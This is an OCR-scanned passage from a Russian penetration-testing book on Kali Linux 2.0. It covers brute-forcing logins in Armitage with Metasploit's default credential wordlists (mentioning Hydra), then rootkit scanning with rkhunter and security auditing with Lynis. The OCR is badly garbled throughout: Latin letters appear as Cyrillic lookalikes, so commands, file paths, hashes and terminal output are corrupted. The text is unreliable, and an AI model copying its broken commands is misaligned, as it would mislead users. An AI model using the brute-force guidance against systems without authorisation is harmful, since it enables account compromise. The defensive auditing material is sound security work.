▼ ІІв зптр 

0] зптр_Іодіп 
' 1^ ззЬ 


_ ззЬ_Іодіп_риЬкеу 
’ Ё Іеіпеі 

[3 Ьгосас1е_епаЫе_Іодіп 
Ц ІеІпеНодіп 


ч 



Іодіп 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Можно ввести имя и пароль. Но если мы их не знаем, то дважды кликаем по ІІ5ЕК_РИЕ 
и выбираем файл со списком пользователей. Аналогичная процедура для РА55_РИЕ — 
выбираем файл с паролями. 


С МеТазрІоіІ: поставляется довольно много файлов со списками дефолтных 
пользователей и паролей: 


1 


І5 -I /изг/БНаге/теІіазрІоіТ-Тгатеѵѵогк/сІаТа/ѵѵогсІІІБТз/ 


Приложения 


Переход ^ 

0®|01 








гоо*@МіАІ: " 

Файл Правка 

Вид 

Поиск 

Терминал Справка 


:~# 1з -1 

/из г/зИа гѳ/тѳііазріоіі: - Т гатеѵѵо гк/с!а1:а/\л/о гсГіізііз/ 

итого 1236 









- Пл/- г- - г- - 

1 

ГООТ 

ГООТ 

754 

Июн 

22 

01:03 

а ѵ - ирсіаТ е - и гТ з. 1: хТ 

- Пл/- г- - г- - 

1 

гооТ 

ГООТ 

7418 

И юн 

22 

01:03 

ЬигпеТТ_Тор_1Ѳ24 .ТхТ 

- Пл/- г- - г- - 

1 

ГООТ 

ГООТ 

3585 

Июн 

22 

01:03 

ЬигпеТТ Тор 500.ТхТ 

- ПЛ/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

236 

Июн 

22 

01:03 

стз4Ѳ0пеТ СІеТаиІТ изегразз.ТхТ 

- Пл/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

68 

Июн 

22 

01:03 

сІЬ2 СІеТаиІТ разз.ТхТ 

- Пл/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

124 

Июн 

22 

01:03 

сІЬ2 СІеТаиН ивегравв.ТхТ 

- ПЛ/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

41 

Июн 

22 

01:03 

сІЬ2 сІеТаиІТ ивег.ТхТ 

- Пл/- г- - г- - 

1 

ГООТ 

ГООТ 

9098 

Июн 

22 

01:03 

сІеТаи'ІТ_ра55_Тог_5ѳгѵ1сез_ипТіа5И .ТхТ 

- Пл/- г- - г- - 

1 

ГООТ 

ГООТ 

23049 

Июн 

22 

01:03 

сіе ТаиТ.Т_изе гразз_То г_зѳ гѵіс ѳз_ипИазИ. Т хТ 

- Пл/- г- - г- - 

1 

ГООТ 

ГООТ 

6786 

Июн 

22 

01:03 

СІеТаиІТ изегз Тог зегѵісѳз ипТіазТі.ТхТ 

- Пл/- г- - г- - 

1 

гооТ 

ГООТ 

496 

Июн 

22 

01:03 

сіііпк ТеІпеТ Ьасксіоог изѳгразз.ТхТ 

- Пл/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

1354 

Июн 

22 

01:03 

Ьсі_огасІе_развиог(І8. свѵ 

- Пл/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

119 

Июн 

22 

01:03 

ІіТТр СІеТаиІТ разе. ТхТ 

- ПЛ/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

155 

Июн 

22 

01:03 

МТТр СІеТаиІТ изегразз.ТхТ 

- ПЛ/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

92 

Июн 

22 

01:03 

ИТТр СІеТаиІТ ивегз.ТхТ 

- Пл/- г- - г- - 

1 

ГООТ 

ГООТ 

100 

Июн 

22 

01:03 

ТіТТр_ома_соттоп.ТхТ 

- Пл/- г- - г- - 

1 

ГООТ 

ГООТ 

23 

Июн 

22 

01:03 

іс!гас_сІѳТаи1Т разз.ТхТ 

- Пл/- г- - г- - 

1 

ГООТ 

ГООТ 

17 

Июн 

22 

01:03 

ісігас СІеТаиІТ изег.ТхТ 

- Пл/- г- - г- - 

1 

ГООТ 

ГООТ 

8670 

Июн 

22 

01:03 

ірті_раззмо гсіз. Т хТ 

- Пл/- г- - г- - 

1 

ГООТ 

ГООТ 

44 

Июн 

22 

01:03 

ірті_изегз.ТхТ 

- ПЛ/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

26417 

Июн 

22 

01:03 

Іоотіа.ТхТ 

- Пл/- г- - г- - 

1 

гооТ 

ГООТ 

177 

Июн 

22 

01:03 

кеуЬоагсІ-раТТегпз.ТхТ 

- Пл/- г- - г- - 

1 

ГООТ 

ГООТ 

69823 

Июн 

22 

01:03 

та1ісіоиз_иг1з .ТхТ 

- Пл/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

383 

Июн 

22 

01:03 

тиТТі ѵепсІог ссТѵ сіѵг разз.ТхТ 

- ПЛ/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

11 

Июн 

22 

01:03 

тиіті ѵепсіог ссТѵ сіѵг изегз.ТхТ 

- ПЛ/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

11957 

Июн 

22 

01:03 

патеІізТ. ТхТ 

- ПЛ/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

16767 

Июн 

22 

01:03 

огасІесіеТаиІТІіазІіез. ТхТ 

- ПЛ/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

59294 

Июн 

22 

01:03 

огасіе СІеТаиІТ раззмогсіз. сзѵ 

- Пл/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

7681 

Июн 

22 

01:03 

огасіе сІеТаиІТ изегразз.ТхТ 

- ПЛ/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

31 

Июн 

22 

01:03 

розТдгез_сІеТаиІТ_ра55. ТхТ 

- Пл/ХГ-ХГ-Х 

1 

ГООТ 

гооТ 

78 

Июн 

22 

01:03 

розТдгез сіеТаиІТ изегразз. ТхТ 

- ПЛ/ХГ-ХГ-Х 

1 

гооТ 

ГООТ 

22 

Июн 

22 

01:03 

розТдгез СІеТаиІТ изег.ТхТ 

- Пл/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

631 

Июн 

22 

01:03 

гооТ изегразз.ТхТ 

- Пл/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

17095 

Июн 

22 

01:03 

грс_патез.ТхТ 

- ПЛ/ХГ-ХГ-Х 

1 

ГООТ 

гооТ 

36 

Июн 

22 

01:03 

гзегѵісез Тгот изегз.ТхТ 

- Пл/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

117 

Июн 

22 

01:03 

зар сотшоп.ТхТ 

- Пл/- г- - г-- 

1 

ГООТ 

ГООТ 

280 

Июн 

22 

01:03 

зар_с!еТаи1Т .ТхТ 

- Пл/ХГ-ХГ-Х 

1 

гооТ 

гооТ 

10803 

Июн 

22 

01:03 

зар іст раТИз.ТхТ 

- ПЛ/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

206 

Июн 

22 

01:03 

зепзітіѵе ТіІез.ТхТ 

- Пл/- г- - г-- 

1 

ГООТ 

ГООТ 

155 

Июн 

22 

01:03 

зѳпзітіѵе Тііѳз міп.ТхТ 

- Пл/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

3838 

Июн 

22 

01:03 

зісі . ТхТ 

- Пл/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

839 

Июн 

22 

01:03 

зпгар СІеТаиІТ разз.ТхТ 

- ПЛ/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

3426 

Июн 

22 

01:03 

ТТТр.ТхТ 

- ПЛ/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

39 

Июн 

22 

01:03 

ТогасаТ тдг СІеТаиІТ разз.ТхТ 

- Пл/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

118 

Июн 

22 

01:03 

ТогасаТ_тдг_сІеТаиІТ_и5егра55. ТхТ 

- ПЛ/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

37 

Июн 

22 

01:03 

ТогасаТ тдг СІеТаиІТ изегз.ТхТ 

- Пл/Х г - X г - X 

1 

ГООТ 

ГООТ 

7835 

Июн 

22 

01:03 

ипіх раззмогсіз. ТхТ 

- ПЛ/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

759 

Июн 

22 

01:03 

ипіх_изегз . ТхТ 

- Пл/ХГ-ХГ-Х 

1 

гооТ 

гооТ 

9 

Июн 

22 

01:03 

ѵпс раззмогсіз.ТхТ 

- ПЛ/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

575885 

Июн 

22 

01:03 

ѵхмогкз соііісіе 20.ТхТ 

- ПЛ/ХГ-ХГ-Х 

1 

ГООТ 

ГООТ 

229871 

Июн 

22 

01:03 

ѵхмогкз соттоп 20.ТхТ 

11 •« 

_* 

■ 








Тем не менее, для брутфорсинга паролей всё таки рекомендуется Нусіга — там есть, 
например, многопоточность 


По материалам сайта ѴѴеЬѴѴаге.Ьіі 


282 













Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Мнение по АгтИа^е (вместо заключения) 

В целом впечатление от Агті1:а§е — очень тяжёлое ]аѵа приложение: занимает почти 1 
Гб оперативной памяти и не очень отзывчивое. Из-за таких приложений и ходит слава о 
]аѵа как о заведомо медленной платформе. ]аѵа совсем не медленная, её 
потрясающую работу можно увидеть в программах ЫеШеапз, Юоѵѵпіоабег, Ѵизе и др. В 
купе с почти таким же медленным и требовательным к памяти Меіазріоіі: (скриптовые 
языки не очень производительные + большая база) работать на слабых машинах в 
Агті1:а§е просто тяжело. 

Что касается мнения о функциональности Агті1:а§е, то оно полностью соответствует 
моему мнению о самом МеТазрІоіІ: — мало эксплойтов и все они тухлые. Т.е. какого-то 
результата от использования этих программ можно ожидать на серверах, админ 
которых умер лет пять-десять назад, и с тех пор эти сервера никто не обновлял... 

Возможно, это моё мнение как дилетанта, и на самом деле всё наоборот. Это как в той 
шутке про кошек: «Как, вы не любите кошек? Да вы просто не умеет их готовить!» 

Тем не менее, эти инструменты должны быть «в чемоданчике» инженера по 
безопасности, Агті1:а§е поможет вам значительно быстрее проверить большое 
количество старых эксплойтов — хотя бы сэкономит время. 


Глава 47. Как сканировать Ыпих на руткиты (гооІкіі$) с помощью 
гкНипІег 


Руткиты (гооТкіІ:) — это вредоносные программы, созданные для получения доступа 
уровня рута, при этом они прячут своё присутствие от антивирусных программ. Обычно 
руткиты устнавливаются на вашу систему троянами, содержащимися вместе с 
загруженными файлами, через известные системные уязвимости, подозрительными 
приложениями к письмам, при веб-сёрфинге или просто после взлома пароля. 

Для Ыпих есть несколько инструментов сканирования руткитов, которые помогают 
противостоять известным или потенциальным руткитам. Один из таких инструментов 
выявления руткитов называется Кооікіі: Нипіег (гкбипіег) . Здесь я опишу, как 

сканировать системы Ыпих на наличие руткитов с помощью гкНипІег. 

Установка гкНипіег на Ыпих 


Для установки гкГіипіег на ОеЬіап, ІІЬипІи или Ыпих МіпТ: 


1 


$ зибо арТ-^еТ іпзіаіі гкЬипіег 


Для установки гкГіипіег на Ребога: 


1 


$ зибо уит іпзТаІІ гкЬипТег 


Для установки гкбипіег на СепЮ5 или КНЕІ. сначала установите репозиторий Кероіюгке 
на свою систему, а затем используйте команду уит: 


1 


$ зибо уит іпзТаІІ гкігипіег 
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Выполняем поиск руткитов на Ыпих 


Для выполнения сканирования на руткиты на вашей системе просто запустите 
следующее: 


1 


$ зисіо гкМипТег -с 


Когда гкбипТег установлена, она может выполнить серию тестов, таких как: 

• Сравнение 5НА-1 хешей системных исполнимых файлов с известными 
хорошими значениями, содержащимися в базе данных. 

• Проверка на известные файлы и каталоги руткитов, а также строки руткитов. 

• Выявление зловредного кода, включая проверку на логирование бэкдоров, лог- 
файлов сниферов и других подозрительных директорий. 

• Выполнение специфичных для троянов проверок, таких как анализ включённых 
сервисов хіпеТсІ. 

• Проводится проверка сетевых портов и интерфейсов. 

• Проводится проверка системного бута. 

• Проводится проверка групп и аккаунтов. 

• Проводится проверка системных конфигурационных файлов. 

• Проводится проверка файловой системы. 

Следующие скриншоты показывают КооТкіТ НипТег в действии. 


ТегтіпаІ - + х 


РегТогшіпд асІсііТіопаІ гооТкіТ сИескз 




5искіТ КоокіТ асШТіопаІ сНескз 

[ 

] 


Сйескіпд Тог ро55іЬІе гооТкіТ Тііез апсі сіігесТогіез 

[ 


] 

СНескіпд -Гог роззіЬІе гооТкіТ зТгіпдз 

[ 


] 

РегТогшіпд таіѵ/аге сііескз 




СЬескіпд гиппіпд ргосеззез Тог зиБрісіоиз Тііез 

[ 


] 

СИескіпд Тог Іодіп Ьаскйоогз 

[ 


] 

СИескіпд Тог зизрісіоиз сіігесТогіез 

[ 


] 

СМескіпд Тог зпіТТег Іод Тііез 

[ 


] 

СИескіпд Тог АрасЬе Ьаскйоог 

[ 


і ] 

РегТогшіпд Ипих зресіТіс сНескв 




СИескіпд Іоайесі кегпеі шойиіез 

[ 

] 


СІіескіпд кегпеі тойиіе патеэ 

[ 

] 


[Рге$5 <ЕГГГЕК> То сопТіпие] 




РегТогшіпд сНескз оп ТЬе пеТѵ/огк рогТз 
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Г- 

ТегтіпаІ 


- + X 


РегТогтіпд дгоир апб ассоипТ сТіескз 




СТіескіпд Тог раззыб Тііе 

[ 

] 


СТіескіпд Тог гооТ едиіѵаІепТ (ІІЮ 0) ассоипТз 

[ 

] 


СТіескіпд Тог раззмогбіезз ассоипТз 

[ 

] 


СТіескіпд То г раззмб Тііе сТіапдез 

[ 

] 


СТіескіпд Тог дгоир Тііе сТіапде$ 

[ 

] 


СТіескіпд гооТ ассоипТ зТіеІІ ТіізТогу Тііез 

[ 

] 


РегТогтіпд зузТет сопТідигаТіоп Тііе сТіескз 




СТіескіпд Тог 55Н сопТідигаТіоп Тііе 

[ 

] 


СТіескіпд Тог гиппіпд зузіод баетоп 

[ 

] 


СТіескіпд Тог зузіод сопТідигаТіоп Тііе 

[ 

] 


СТіескіпд ІТ $у$1од гешоТе Іоддіпд і$ аііоыеб 

[ 

] 


РегТогшіпд ТіІезузТеш сТіескз 




СТіескіпд /сіеѵ Тог зизрісіоиз Тііе Турез 

[ 

] 


СТіескіпд Тог Тіісісіеп Тііез апб бігесТогіе5 

[ 

] 


[Ргез5 <ЕМЕК> То сопТіпие] 



N 

БузТеш сТіескз зиттагу 



II 


Когда сканирование завершено, гкТшпТег сохраняет результат в /ѵаг/Іо§/гкТіипТег.Іо§. 
Вы можете отобразить выданные предупреждения следующим образом: 


1 


$ зіісіо §гер \Л/агпіп§ /ѵаг/Іо§/гкТіипТег.Іо§ 


і| 

[21:33:23] СТіескіп§ /сіеѵ Тог зизрісіоиз Тііе Турез [ \Л/агпіп§ ] 

2 1 

[21:33:23] \Д/агпіп§: Зизрісіоиз Тііе Турез Тоипсі іп /сіеѵ: 

3| 

[21:33:23] СТіескіп§ Тог Тіісісіеп Тііез апсі бігесТогіез [ \Л/агпіп§ ] 

4| 

[21:33:23] \Л/агпіп§: Нісісіеп сІігесТогу Тоипб: ’/еТс/.іаѵа: сІігесТогу ' 

5 1 

[21:33:23] \Л/агпіп§: Нісісіеп сІігесТогу Тоипсі: '/сіеѵ/.исіеѵ: сІігесТогу ' 

6| 

[21:33:23] \Л/агпіп§: Нісісіеп Тііе Тоипсі: /беѵ/.іпіТгатТз: зутЬоІіс Ііпк То '/гип/іпіТгатТз' 


КооТкіТ НипТег полагается на набор базы данных файлов для выявления руткитов. Если 
вы хотите проверить, актуальна ли база, просто запустите гкТшпТег с опцией ирбаТе". 
Если есть новые версии файлов баз данных, он автоматически получит актуальные 
файлы используя \л/§еТ: 


1 


$ зисіо гкІпипТег --ирбаТе 


гкТіипТег может быть запущен как сгощоЬ с опцией сгощоЬ", в этом случае гкТшпТег 
выполнит сканирование в неинтерактивном режиме и сохранит результаты 
сканирования в /ѵаг/Іо§/гкТіипТег.Іо§ для оффлайн проверки. 

Будучи инструментов сканирования руткитов, гкТшпТег может только выявлять руткиты, 
но не удалять их. Так что следует делать, если гкТшпТег сообщает о наличии руткита или 
показывает какие-либо предупреждения? Во-первых, нужно проверить, является ли это 
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ложной тревогой или нет. Предупреждения могут быть вызваны просто тем, что 
осуществляется обновление ПО, изменёнными системными настройками или другими 
легитимными изменениями исполнимых файлов. Если вы не уверены, поищите 
помощь из ресурсов, такой вариант как пользовательская почтовая рассылка гкбипіег 
может быть одной из опций. 

Если ваша система действительно заражена руткитом, попытки удалить руткит 
самостоятельно могут быть не лучшим вариантом, если вы не эксперт по безопасности, 
который способен диагностировать весь механизм, вектор атаки и путь проникновения 
конкретного руткита. 

Когда руткит найден на вашей системе, лучший вариант в этой ситуации, пожалуй, это 
отключение скомпрометированной системы от внешнего мира, а затем перенос всех 
ваших данных с этой системы. Когда вы это выполняете, не делайте резервных копий 
каких-либо исполнимых файлов, которые вы не можете подтвердить, что они чистые. 


Глава 48. Аудит безопасности Ыпих 

Как много уязвимостей и эксплойтов Ыпих было открытое за последние б месяцев? 
Много. Недавние ЗИеІІзКоск, НеагіЫеесІ, РоосІІе, СЬозІ; и, может быть, это ещё далеко 
не конец. В какой-то момент я перестал чувствовать себя в безопасности с моим Ыпих, 
ведь подверженными оказались базовые пакеты. Что дальше? Мой орепѴРИ больше 
не безопасен? Мои ключи сессии 55Н уязвимы? Я решил сделать аудит безопасности 
моей системы Ыпих. После настройки внешнего файервола, я вдруг понял, что это 
просто слишком большая задача для меня, если выполнять её вручную. Вот тогда я и 
обнаружил І_упІ5. І_упІ5 — это инструмент аудита безопасности с открытым исходным 
кодом. Он достаточно хорошо документирован и сделал быстро многие вещи, на 
которые бы у меня ушла уйма времени. 

На протяжении всего теста я использовал бесплатную версию І_упІ5. 

Как работает аудит безопасности Ыпих? 

1_упІ5 выполняет сотни индивидуальных тестов для определения состояния 
безопасности системы. Многие из этих тестов являются частью общих руководящих 
принципов безопасности и стандартов. Примеры включают в себя поиск 
установленного программного обеспечения и определение возможных недостатков 
конфигурации. І_упІ5 идёт дальше и делает также тест индивидуальных компонентов 
программного обеспечения, проверяет связанные конфигурационные файлы и 
измеряет производительности. После этих тестов, будет отображён отчёт по 
сканированию с вскрытыми находками. 

Обычное использование І_упі$: 

1. Аудит безопасности 

2. Сканирование на уязвимости 

3. Усиление системы 

Установка 

Вы можете установить І_упІ5 из репозитория (например, используя ушп или арІ-§еІ), но 
я обнаружил, что там не самая последняя версия І_упІ5. Лучше загрузите её в локальную 
директорию и запустите её оттуда. 
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І_упІ5 с установкой — пакет 

Хотя установка не требуется, обычным методом использования 1_упі$ является 
установка её с помощью пакета. Он может быть из репозитория операционной 
системы или сделанным вручную. Пожалуйста, обратите внимание, в погоне за 
стабильностью некоторые репозитории не обновляют программное обеспечение после 
релиза, за исключением обновлений безопасности. Это может стать результатом 
использования очень старой версии І_упІ5, что не является предпочтительным. 

Ос н ова нн ы е н а К е б На!: $ аисіо уит іпэТаІІ Іупіа 

Ос н ова нн ы е н а Ѳ е Ьіап: $ аисіо арі - д е і: іпвТаІІ Іупіа 

Но, пожалуйста, не используйте этот способ. Это бесполезный запуск старого пакета! 
Зачем вообще тогда проводить аудит безопасности? 

І_упі$ без установки — портативная версия 

Пойдя этим путём, вы получите самый свежий пакет. 

Создайте директорию (наприллер /изг/ІосаІ/Іупіз) 

1_упі$ может быть запущен из любой директории (или со съёмного носителя). 


1| 

тіаІ@тіаІ-Ѵіг1:иаІВох ~ $ зисіо -5 

21 

[зиёо] раззѵѵогс] (юг тіаі: 

3| 

тіаІ-ѴігІиаІВох ~ # тксііг /изг/ІосаІ/Іупіз 

4| 

тіаІ-ѴігІиаІВох ~ # сс! /изг/ІосаІ/Іупіз/ 

51 

тіаІ-ѴігТиаІ Вох Іупіз # 


ТегтіпаІ — + х 


іліаІ@тіаІ-ѴігТиаІВох - $ зисіо -5 
[ зисіо] раззмогсі ^ог тіаі: 

- # ткгііг /изг/іосаі/іупіз 
# ей /изг/іосаі/іупіз/ 

Іупіз # мдеТ Н«р5://сІ5оГу.сот/Ше5/Іупі5-1.б.4.1:аг.д2 
- -2Ѳ15-02-15 12:55:25-- Ь«р5://сІ5оГу.сот/Ше5/ІупІ5-1.6.4.1:аг.д2 

Распознаётся сізоТу.сот (сізоТу.сош)». 149.210.134.182 

Подключение к сізоіу.сот (сізо^у.сот) 1149.210.134.1821:443... соединение установ 
лено. 

НТТР-запрос отправлен. Ожидание ответа... 200 ОК 
Длина: 171953 (168К) [аррІісаТіоп/осТеТ-зТгеат] 

Сохранение в: «Іупі5-1.б.4.Таг.дг» 

100%[] 171,953 168КВ/5 за 1.05 

2015-02-15 12:55:29 (168 КВ/5) - «ІупІ5-1.6.4.гаг.д2» сохранён [171953/171953] 

ІуПІ5 # | 


Загружаем архив І.упІ5 

Идём в секцию загрузок и копируем ссылку на тарболл (архив) І_упі$ (текущая версия 
ІупІ5-1.б.4.1;аг.§2). Используйте эту ссылку вместе с \л/§е! (обычно уже установлен по 
умолчанию). Пользователи Мае 05 могут использовать инструмент сигі, тогда как ВЗй 
пользователи могут использовать ^еІсН. 


11 

тіаІ-ѴігІиаІВох Іупіз # \л/§е1 Ьі1р5://сІ50іу.сот/( : ІІе5/ІупІ5-1.6.4.1:аг.§2 
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2 1 

-2015-02-15 12:55:25- ЬТТр5://сІ5оТу.сотДіІе5/ІупІ5-1.6.4.Таг.§2 

3| 

Распознаётся сізоТу.сот (сізоТу.сот)... 149.210.134.182 

4| 

Подключение к сІБоТу.сот (сізоТу.сот) 1149.210.134.1821 :443... соединение 
установлено. 

5 1 

НТТР-запрос отправлен. Ожидание ответа... 200 ОК 

6| 

Длина: 171953 (168К) [аррІісаТіоп/осТеТ-зТгеат] 

7 1 

Сохранение в: «Іупіз-1.6.4.Таг.§2» 

8 1 


9 1 

100%[-&атр;§Т;] 171,953 168 КВ/б за І.Об 

10| 


111 

2015-02-15 12:55:29 (168 КВ/б) - «Іупіз-1.6.4.Таг.§2» сохранён [171953/171953] 

121 


131 

тіаІ-ѴігТиаІВох Іупіз # 5Ііа25б5ит Іупіз-1.б.4.Таг.§2 

141 

886с74Ь591706Т896149Те74асіЬ481Ь58с549сі32243сІ0с1 : 620Ь46сіТсіс]25сіс66с) Іупіз- 
1.6.4.Таг.§2 

151 

тіаІ-ѴігТиаІВох Іупіз # 


После скачивания, протестируйте файл, чтобы подтвердить его целостность загрузки. 
Связанные хэши 5НА1, 5НА256 присутствуют также на официальном сайте. В 
зависимости от вашей ОС, это может быть выполнено в командной строке с зНаІ, 
збаізит, зба256зит или с орепззі. 


ТегтіпаІ 


Іупі.5 # 5Иа25б5иш ІупіБ-1.б.4.Таг.д2 

886с74Ь5917Ѳ6Т896149Те74асіЬ481Ь58с549сІ32243сіѲсТб2ѲЬ4б<іТ(ісі25сісб6сІ ІупІБ- 1 .6.4. Та 
г.дг 

Іупіз # Таг гхѵТ ІупіБ-1.6.4.Таг.дг 

Іупіз/СНАМбЕЮб 

іупіз/сот-ківіяокз 

ІупІБ/РАО 

ІупІ5/І№ТАІ_1. 

ІупІБ/ІЛСЕМБЕ 

Іупіз/КЕАОМЕ 

ІуПІ5/СІЬ/ 

ІупІБ/гіЬ/іпТедгіТу. (ІЬ 

Іупіз/сІЬ/БЫ.сІЬ 

Іупіз/сіЬ/ТіІерегтБ.сіЬ 

Іупі5/сіЬ/таІыаге-5и5р.сіЬ 

Іупіз/сіЬ/таІмаге. сіЬ 

ІупІБ/сІЬ/ЬіпТБ.сІЬ 

ІупІБ/сІеТаиІТ.ргТ 

ІупіБ/ехТгаз/ 

ІупіБ/ехТгаз/КЕАОМЕ 
Іупі5/ехТга5/ТіІе5. баТ 
Іупіз/ехТ гаБ/ІупІБ. Брее 
ІупІБ/ехТгаБ/БуБТетсІ/ 

ІупіБ/ехТгаБ/БуБТепісі/ІупіБ. Бегѵісе 


1| 

тіаІ-ѴігТиаІВох Іупіз # зііаізит Іупіз-1.6.4.Таг.§2 

2 1 

тіаІ-ѴігТиаІВох Іупіз # зЬаІ Іупіз-1.6.4.Таг.§2 


По материалам сайта ѴѴеЬѴѴаге.Ьіг 


288 































Тестирование на проникновение с помощью Каіі Ыпих 2.0 



тіаІ-ѴігТиаІВох Іупіз # орепззі зЬаІ Іупіз-1.6.4.1:аг.§2 


Отображаемый в результате хэш должен быть в точности таким же, как на веб-сайте. 
Если не так, загрузите программу на другую машину или через браузер, для 
подтверждения, что загрузка не повреждена. 


Распаковка архива 


Теперь распакуйте архив и перейдите в каталог Іупіз: 


1| 

тіаІ-ѴігТиаІВох Іупіз # іаг іхѵі Іупіз-1.6.4.1:аг.§2 

21 

тіаІ-ѴігіиаІВох Іупіз # ссі Іупіз/ 


1уПІ5 # ССІ ІуПІБ/ 
Іупіз и І5 

СНАМ6ЕЮ6 ЛЬ ехТгах 

іпсіийе ИСЕМ5Е 

1упІ5.8 КЕАОМЕ 

С0МТКІВІІТ0К5 аеГаии.ргТ РАО 

ІК5ТАИ Іупіі 

ріидіпз 





Меню помощи І.упІ5 

1_упі$ поставляется со своим собственным меню помощи, которое показывает 
некоторые базовые опции и как выполнить простейшие действия: 


1| 

тіаІ-ѴігІиаІВох Іупіз # ./Іупіз -беір 

2 1 


3| 

[ І_упіз 1.6.4 ] 

4| 


5 1 

########################################################################## 

6| 

І_упіз сотез ѵѵііЬ АВ50ШТЕІ.У N0 ѴѴАВВАІМТУ. ТЫз із Ітее зоііл/ѵаге, апсі уои аге 

ѵѵеісоте Іо гесПзТгі ЬиТе ІІ ипсіег ТТіе Іегтз о^ ІІіе ОІМІІ СепегаІ РиЫіс Ысепзе. 

Бее ТИе ЫСЕІМБЕ Тііе Тог сіеіаііз аЬоиІ изіп§ ТТііз зоііѵѵаге. 

71 


81 

СоругідЫ: 2007-2014 - СІБОТу &атр; МісЬаеІ Воеіеп, ЫТрУ/сізоІу.сот 

Епіегргізе зиррогТ апсі рІи§іпз аѵаіІаЫе ѵіа СІБОТу - ИТ1:р://сІ5оТу.сот 

91 

########################################################################## 

10 


111 

[+] ІпіІіаІІ 2 Іп§ рго§гат 

121 


131 

Бсап орбопз: 

141 

— аисПТог "&ІІ;пате&§1:;" : АисІіТог пате 

151 

— сТіеск-аІІ (-с): СІіеск зузіет 

16 

-по-1о§ : Ооп'1: сгеаіе а Іо§ ТІе 

171 

—репТезТ: І\Іоп-ргіѵіІе§есІ зсап (изеіиі Тог репіезі) 

181 

—ргоТіІе &ІТ;ргоТМе&ёТ; : Бсап ТТіе зузіет ѵѵіііі 1Ье §іѵеп ргоіііе Тііе 
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19 


--риіск (-Ц) : Циіск тоЬе, сіоп'Т ѵѵаіі: Іог изег три! 

20 


--Іезіз "&ІІ;Іе5І5&§1;" : Кип опіу Іезіз сіеііпесі Ьу &ІІ;1:е5І5&§1; 

21 


-1е$1$-са1е§огу "&І1:;са1:е§огу&§1:;" : Вип опіу Іезіз сіеііпесі Ьу &І1;са1:е§огу&§1:; 

22 



23 


Ьауоиі; орііопз: 

24 


-ПО-СОІОГ5 : Ооп'Т изе соіогз іп оиіриі; 

25 


--риіеі (-р): N 0 оиіриі, ехсері \л/атіп§з 

26 


-геѵегзе-соіогз : Оріітііе соіог сіізріау Іог Іі§Ы Ьаск§гоипсІ5 

27 



28 


Мізс орііопз: 

29 


-сЬеск-ирсіаІе : СЬеск Іог ирсіаіез 

30 


~сІеЬи§ : ЭеЬи§ Іо§§іп§ Іо зсгееп 

31 


-ѵіе\л/-тапра§е (--тап): Ѵіеѵѵ тап ра§е 

32 


-ѵегзіоп (-Ѵ): йізріау ѵегзіоп питЬег апсі риіі: 

33 



34 


Епіегргізе орііопз: 

35 


-рІи§іп-сІіг "&ІІ;раіЬ&§1:;" : йеЯпе раіЬ оІаѵаіІаЫе рІи§ІП5 

36 


-иріоасі: ІІрІоасі сіаіа Іо сепігаі посіе 

37 



38 


5ее тап ра§е апс) сіоситепіаііоп Іог аІІ аѵаіІаЫе орііопз. 


Запуск І.упІ5 

Я сделал быстрый тест на моей Ыпих М і пТ с использованием І_упІ5. 
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Если у кого-то «затык» при проверки РНР: 
[+] ЗоДѵѵаге: РНР 


- СЕіескіп§ РНР [ N01 РОІІМЭ ] 

— Сбескіп§ РНР сІізаЫесІ Ігіпсііопз [ ЫОЫЕ ] 

То отредактируйте файл іпсІисІе/і:е5І:5_рЬр — сделайте инклуд файла рНр.іпі. 
Вы можете использовать различные команды: 


1| 

тіаІ-ѴігІиаІВох Іупіз # ./Іупіз -с 

(или) 

1| 

тіаІ-ѴігІиаІВох Іупіз # ./Іупіз — аисІіТог "ѴѴеЬѴѴаге.Ьіі" -с -Ц 

(или) 

1| 

тіаІ-ѴігІиаІВох Іупіз # ./Іупіз -аисіііог "ѴѴеЬѴѴаге.Ьіі" -с -Ц -ц 

(или) 

1| 

тіаІ-ѴігІиаІВох Іупіз # ./Іупіз -аисіііог "ѴѴеЬѴѴаге.Ьіі" -с -ц -Ц -репіезі: 

(или п 

одобные) 


Изучение отчёта І.упІ5 

1_упі$ сохраняет свои отчёты в /ѵаг/Іо§/Іупі$.Іо§. Быстрое сканирование І_упІ5 не выявило 
уязвимостей вроде ЗИеІІзИоск или тому подобных. Но, тем не менее, программа 
выдала несколько предупреждений и множество советов как усилить систему. 

Особенно меня обрадовали советы по укреплению веб-сервера и почтового сервера — 
т. е. І_упІ5 и их. 

Отчёт сохраняется в файле /ѵаг/Іо§/Іупіз.Іо§ в нём можно найти дополнительные 
детали. 

Хорошее 

То, что мне понравилось в І_упІ5 (версия с открытым кодом): 

• Для бесплатного инструмента, І_упІ5 обеспечивает хорошее тестирование. 

• Отчёты просты для понимания. 

• Она использует 0РІ_ѵЗ — спасибо. 

• Пользователи могут писать собственные плагины для использования с ней. 

• Присутствует не просто анализ системы, а также тестирование установленного 
софта. Особенно интересно было читать рекомендации по укреплению веб¬ 
сервера и почтового сервера. 

Возможные улучшения 

